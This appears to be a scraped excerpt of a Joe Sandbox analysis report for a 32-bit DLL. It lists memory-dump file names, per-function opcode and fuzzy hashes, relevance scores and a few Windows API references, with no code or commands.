Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: |~l
API String ID: 0-3736151922
Opcode ID: 8565dba51f62ca82745c93959c5409f40a5920b3d56ea50adc44597dd0b8764c
Instruction ID: 84f2ddf535e0b305667e0fc1eaa7a677a232d616235e0f268fbef1196e0916c4
Opcode Fuzzy Hash: 8565dba51f62ca82745c93959c5409f40a5920b3d56ea50adc44597dd0b8764c
Instruction Fuzzy Hash: 182210B3F211144BCB48CE6DCC927DAB6E3BFD821871E8539E809E7705E639D9158A84

Function 6CED796A Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: f2c87586908c0f31bac61e694a3f321347c8c5de47c02b09b6511a8dcfb0cc57
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 2AC1A77221A19349EF0D473AD57403EFAB15A926BD33B175DD4B3CBAC8EE20E126C520

Function 6CED7D9F Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: f058e63128f936b74b66de22efb4529f94392a21cc6ec3a98f14c70e7bd23993
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: DAC1A87220A19349EF1D473AD53403EFBB15A926B933B275DD4B2CFAC8EE10E126C520

Function 6CED7535 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: fa1a988fa67657d3412e120d5f7c82b319d75e7d5b47afa4d528507972b5da37
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 14C1877221A16349EF0D477ED53403EBAB15E926BD33B175DD4B2CBAC8EE10E166C520

Function 6CED711D Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 2c2152f44ce2f743885f3734f13594f1c1de3cf53c3253d63809190aed69ca9a
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 03C1A77221A19349EF0D477AD53403EBAB15A926BD33B175DD4B3CBAC8EE10E166C610

Function 6CEDD3E9 Relevance: .2, Instructions: 197COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
Instruction ID: 92597462dda5ee8c6fa73e05010287dc90a0346a3c9a22d03ebce77c0dbb8b54
Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
Instruction Fuzzy Hash: 98615C75E016258BDB18CF1EC890169FBF6BF8430472AC16AD819DB715E670EA42CFA1

Function 6CEFBDBD Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da7a9d560fe5d0854689fbfa63b0a1fe2b8705d5df121acb79f72d53e34f220a
Instruction ID: d8033aa397765dd5b7bf623fc3f3995530b0b894a1eb93b8069b0bbbb65ac4e5
Opcode Fuzzy Hash: da7a9d560fe5d0854689fbfa63b0a1fe2b8705d5df121acb79f72d53e34f220a
Instruction Fuzzy Hash: FB3107B291C610EFE315AF19D881ABAFBE4FF18310F06092DEAC9D7340D63558508B97

Function 6CEB28DA Relevance: 18.2, APIs: 12, Instructions: 170COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB28DF
InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 6CEB28F5
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEB2971
GetQueuedCompletionStatus.KERNEL32(?,00000000,?,?,000001F4,?,?,00000000), ref: 6CEB298B
